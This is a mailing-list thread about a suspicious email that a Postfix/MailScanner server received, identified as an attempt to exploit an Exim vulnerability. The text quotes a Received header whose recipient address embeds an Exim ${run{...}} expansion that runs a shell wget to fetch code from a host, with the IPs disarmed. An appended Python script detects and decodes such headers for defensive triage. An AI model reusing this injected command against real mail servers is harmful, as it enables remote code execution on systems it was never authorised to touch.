possible attack against MailScanner ?
Heino Backhaus
heino.backhaus at fink-computer.de
Mon Jul 15 11:30:32 UTC 2019
Thanks for answering...
For now, I've got a main question: As it seems, they tried to download
and execute some code, so I need to make sure whether they succeeded,
because if so, I need to shut down MailScanner immediately.
But as you stated, this should only work with Exim ...
The next question is: Where did the *Received: 1-31* lines come from?
They look a bit strange to me.
Kind regards
H. Backhaus
Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink
I was gratified to be able to answer promptly, and I did.
I said I didn't know.
Mark Twain
On 15.07.2019 at 13:13, Martin Hepworth wrote:
> Looks like an attempt at the Exim vulnerability exploitation rather
> than mailscanner
>
> On Mon, 15 Jul 2019 at 11:59, Heino Backhaus
> <heino.backhaus at fink-computer.de
> <mailto:heino.backhaus at fink-computer.de>> wrote:
>
> Hello list,
>
> I need some help analysing the following email, which I received last week.
>
> Mailwatch Mail-Metadata:
>
> Received: from sab.com (unknown [46.22.132.94])
> by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
> for
> <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local>;
> Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
> Received: 1
> Received: 2
> Received: 3
> Received: 4
> Received: 5
> Received: 6
> Received: 7
> Received: 8
> Received: 9
> Received: 10
> Received: 11
> Received: 12
> Received: 13
> Received: 14
> Received: 15
> Received: 16
> Received: 17
> Received: 18
> Received: 19
> Received: 20
> Received: 21
> Received: 22
> Received: 23
> Received: 24
> Received: 25
> Received: 26
> Received: 27
> Received: 28
> Received: 29
> Received: 30
> Received: 31
>
>
>
> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in case...
> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in case...
>
> Versions:
> MailWatch Version: 1.2.9
> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
> Postfix Version: 3.1.0
> MailScanner Version: 5.1.2
> ClamAV Version: 0.102.0-devel-20190715
> SpamAssassin Version: 3.4.2
> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
> Can you help me bring some light into this darkness...
>
> --
> Martin Hepworth, CISSP
> Oxford, UK
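As an added example (not code from the thread or from the MailScanner project), here is a small triage script a defender can run over captured Received headers or mail-log lines to flag Exim string-expansion operators such as `${run{` in the recipient local part, the pattern Martin identifies above, and to render the hex escapes readable for the analyst. The sample headers are constructed, the first adapted from the disarmed one quoted in the thread; treating the bare `xNN` tokens as `\xNN` escapes whose backslashes were lost in the copy is an assumption.

```python
import re
from typing import Optional

# Constructed sample headers. The first is adapted from the one quoted in this thread:
# the IPs were already disarmed by the poster, and the backslashes of the \xNN escapes
# are assumed to have been lost when the mail was pasted (so "x2f" appears bare).
SUSPICIOUS_HEADER = (
    "Received: from sab.com (unknown [46.22.132.94]) by mailscanner.mydomain.local "
    "(Postfix) with SMTP id D3F551005AD for "
    "<root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}"
    "@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)"
)
BENIGN_HEADER = (
    "Received: from mx.example.org (mx.example.org [192.0.2.10]) by mailscanner.mydomain.local "
    "(Postfix) with ESMTP id ABC123 for <root@mailscanner.mydomain.local>; "
    "Thu, 11 Jul 2019 20:00:00 +0200 (CEST)"
)

FOR_CLAUSE = re.compile(r"\bfor\s+<([^>]*)>")
# Exim string-expansion items; none of these belongs in a legitimate local part.
EXPANSION = re.compile(r"\$\{(run|readsocket|perl|dlfunc)\{", re.IGNORECASE)
# \xNN escapes, or bare xNN where the backslash was stripped. The bare form is
# ambiguous in general ("exec" would match), so it is only applied to a local part
# that EXPANSION has already flagged. A lost "\t" stays a literal "t".
HEX_ESCAPE = re.compile(r"\\?x([0-9a-fA-F]{2})")


def recipient_local_part(header: str) -> Optional[str]:
    """Return the local part of the address in the 'for <...>' clause, if any."""
    m = FOR_CLAUSE.search(header)
    if not m:
        return None
    return m.group(1).rsplit("@", 1)[0]


def decode_escapes(text: str) -> str:
    """Render hex escapes as characters so an analyst can read the expansion."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def analyse_header(header: str) -> dict:
    """Flag a Received header whose recipient carries an Exim expansion operator."""
    local = recipient_local_part(header)
    if local is None or not EXPANSION.search(local):
        return {"suspicious": False, "local_part": local, "decoded": None}
    # The poster's *...* marks around the disarmed IPs are not part of the address.
    return {"suspicious": True, "local_part": local,
            "decoded": decode_escapes(local.replace("*", ""))}


def scan(lines) -> list:
    """Run analyse_header over captured headers and return only the flagged ones."""
    return [r for r in map(analyse_header, lines) if r["suspicious"]]
```

Because the front end here is Postfix, which performs no Exim-style string expansion, a hit only records an attempt against this host; the same scan over the log of any Exim instance downstream is what answers the "did they succeed" question.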